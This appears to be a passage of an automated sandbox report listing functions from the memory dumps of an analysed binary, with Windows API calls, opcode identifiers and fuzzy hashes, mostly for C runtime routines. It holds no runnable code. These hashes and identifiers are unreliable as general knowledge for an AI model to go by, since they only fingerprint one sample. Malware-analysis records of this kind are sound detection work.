                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            • Opcode ID: e7281fd609c3106c0c909929b7942df858ff2c5a866c7265aef8ad6113a521fa
                                                                                                                                            • Instruction ID: d0dcc7bb336abb701bcc015160c95cfd1d415a4e49015081c077152140e836e3
                                                                                                                                            • Opcode Fuzzy Hash: e7281fd609c3106c0c909929b7942df858ff2c5a866c7265aef8ad6113a521fa
                                                                                                                                            • Instruction Fuzzy Hash: DA112C31304911EAE610267A5C81EEB2659CBC0378776023EF438822D1EE7DCCD7812C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02230264, Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 549e127746ad6c7bd3ee20d666b9d2ccda9dade7604bf89d19fa89fb802e33e3
                                                                                                                                            • Instruction ID: b46ce47f677d4acb84ae09198256403967eeabbd5c2bd97b27302a095c3422a1
                                                                                                                                            • Opcode Fuzzy Hash: 549e127746ad6c7bd3ee20d666b9d2ccda9dade7604bf89d19fa89fb802e33e3
                                                                                                                                            • Instruction Fuzzy Hash: C4119AB1F65222ABCB334BE8DC44B7A7754BF017A4B110121E915A7194D7B0EE01C7F4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0223684C, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,022369B1,00000000,?,0223D315,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 02236862
                                                                                                                                            • GetLastError.KERNEL32(?,0223D315,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,022369B1,00000000,00000104,?), ref: 0223686C
                                                                                                                                            • __dosmaperr.LIBCMT ref: 02236873
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2398240785-0
                                                                                                                                            • Opcode ID: 750d90e04018309d6e3ce2e80e93ff16eb5e1b86fb368af3d40798a4c1480b2f
                                                                                                                                            • Instruction ID: 5fef0073a15a426860b69ab2a1f38fca6a30455ce91ff16718fa69de4e3a17ad
                                                                                                                                            • Opcode Fuzzy Hash: 750d90e04018309d6e3ce2e80e93ff16eb5e1b86fb368af3d40798a4c1480b2f
                                                                                                                                            • Instruction Fuzzy Hash: 29F06271610116BB8B221BE6CC0896AFF6DFF496A03414521A918C7124D732E821CFD8
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 022368B5, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,022369B1,00000000,?,0223D2A0,00000000,00000000,022369B1,?,?,00000000,00000000,00000001), ref: 022368CB
                                                                                                                                            • GetLastError.KERNEL32(?,0223D2A0,00000000,00000000,022369B1,?,?,00000000,00000000,00000001,00000000,00000000,?,022369B1,00000000,00000104), ref: 022368D5
                                                                                                                                            • __dosmaperr.LIBCMT ref: 022368DC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2398240785-0
                                                                                                                                            • Opcode ID: 7d495383b710f1faf093cc59933ccc85a4bded580e77670141baabca898ebb25
                                                                                                                                            • Instruction ID: d7d5dbde61d2107b9c54ace8efd4d4e05ebb96962e43fc24327e4548d235f6bf
                                                                                                                                            • Opcode Fuzzy Hash: 7d495383b710f1faf093cc59933ccc85a4bded580e77670141baabca898ebb25
                                                                                                                                            • Instruction Fuzzy Hash: 27F086B1611216BB8B321FE6DC08966FF6DFF457A03114121F918D7524D731E822DBE4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00420A45, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WriteConsoleW.KERNEL32(00403AF0,73B76490,0042CEB8,00000000,00403AF0,?,0041DE8F,00403AF0,00000001,00403AF0,00403AF0,?,004176EC,00000000,?,00403AF0), ref: 00420A5C
                                                                                                                                            • GetLastError.KERNEL32(?,0041DE8F,00403AF0,00000001,00403AF0,00403AF0,?,004176EC,00000000,?,00403AF0,00000000,00403AF0,?,00417C40,00403AF0), ref: 00420A68
                                                                                                                                              • Part of subcall function 00420A2E: CloseHandle.KERNEL32(FFFFFFFE,00420A78,?,0041DE8F,00403AF0,00000001,00403AF0,00403AF0,?,004176EC,00000000,?,00403AF0,00000000,00403AF0), ref: 00420A3E
                                                                                                                                            • ___initconout.LIBCMT ref: 00420A78
                                                                                                                                              • Part of subcall function 004209F0: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00420A1F,0041DE7C,00403AF0,?,004176EC,00000000,?,00403AF0,00000000), ref: 00420A03
                                                                                                                                            • WriteConsoleW.KERNEL32(00403AF0,73B76490,0042CEB8,00000000,?,0041DE8F,00403AF0,00000001,00403AF0,00403AF0,?,004176EC,00000000,?,00403AF0,00000000), ref: 00420A8D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                            • Opcode ID: fa8bd8c12c7a88df13905f5eddcf1dd08d9ba8f59b07f20002aad9ac96aeefa0
                                                                                                                                            • Instruction ID: a013aed45aa20be437475b0026bfe262562a16a8948ae9efbea31755940ae5c1
                                                                                                                                            • Opcode Fuzzy Hash: fa8bd8c12c7a88df13905f5eddcf1dd08d9ba8f59b07f20002aad9ac96aeefa0
                                                                                                                                            • Instruction Fuzzy Hash: A0F03736700129BBCF325FD5EC0598E7F65FF147A1F814025FA1885131D6318861EB9C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004146E1, Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 004146EA
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(00000000,?,0041B759,00000000,00000000,00000000,E80042EF,?,0041B780,00000000,00000007,00000000,?,0041BB82,00000000,00000000), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 004146FD
                                                                                                                                            • _free.LIBCMT ref: 0041470E
                                                                                                                                            • _free.LIBCMT ref: 0041471F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: a391a878dd04a21bc529b656dfea6a3e7df8aa93c82ee3481a9b03db89e499dc
                                                                                                                                            • Instruction ID: c745ba60f97e2d4d87b6af78ea720ad5864cbd823f739a73dd20a150a1001671
                                                                                                                                            • Opcode Fuzzy Hash: a391a878dd04a21bc529b656dfea6a3e7df8aa93c82ee3481a9b03db89e499dc
                                                                                                                                            • Instruction Fuzzy Hash: F9E09A75600624EB8B216F16FC419863A71FBC47153C2913AF81452231CB3905DB9FCD
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0223AA75, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0223A81E: GetOEMCP.KERNEL32(00000000,0223AA90,?,?,02232382,02232382,?), ref: 0223A849
                                                                                                                                            • _free.LIBCMT ref: 0223AAED
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.924566001.0000000002220000.00000040.00000001.sdmp, Offset: 02220000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: hdi
                                                                                                                                            • API String ID: 269201875-2356819157
                                                                                                                                            • Opcode ID: 71e0bdbd61226f560987ae5134c729664201e387e0fb19382433886adac68cab
                                                                                                                                            • Instruction ID: 141049327b2f686fc2a7f8e5ebd2555846d2b1c4c5eaef747ec7e4cc0731199c
                                                                                                                                            • Opcode Fuzzy Hash: 71e0bdbd61226f560987ae5134c729664201e387e0fb19382433886adac68cab
                                                                                                                                            • Instruction Fuzzy Hash: 2A31F0B291034AAFCB12DFA8C880BDE77F6EF44314F11406AE8409B2A4EB71D951CF90
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041A5CE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetOEMCP.KERNEL32(00000000,0041A840,00417373,00000000,?,?,00000000,?,00417373), ref: 0041A5F9
                                                                                                                                            • GetACP.KERNEL32(00000000,0041A840,00417373,00000000,?,?,00000000,?,00417373), ref: 0041A610
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ssA
                                                                                                                                            • API String ID: 0-2889831464
                                                                                                                                            • Opcode ID: b9bbfe466411d2ab749a1a2af092cd243e78ba52f480a5dc930c3f105a7c246f
                                                                                                                                            • Instruction ID: 1e92f9a8aadae32bac15e37fb92d95dc9b840e940613ad1b39aa9e2a43853cf2
                                                                                                                                            • Opcode Fuzzy Hash: b9bbfe466411d2ab749a1a2af092cd243e78ba52f480a5dc930c3f105a7c246f
                                                                                                                                            • Instruction Fuzzy Hash: 97F0AF70901104CBD720CBA5D8087E937B0EB10339F984726E465CA2E1CB75989ACF4E
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004149D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CommandLine
                                                                                                                                            • String ID: (5h
                                                                                                                                            • API String ID: 3253501508-675800470
                                                                                                                                            • Opcode ID: beb67ad663db78c7610347751781c3771dfaccd589a2ec0b062c8c4b8a9e0707
                                                                                                                                            • Instruction ID: 75196fedf8d1f3d5a06a7a6899a74b00b5963f88b46ea201bd39e62f72bf01a4
                                                                                                                                            • Opcode Fuzzy Hash: beb67ad663db78c7610347751781c3771dfaccd589a2ec0b062c8c4b8a9e0707
                                                                                                                                            • Instruction Fuzzy Hash: 2BB002B9A25340CFC7619F74FA2D2543BB0F6997023C116B5D415C2721D735501BDF18
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%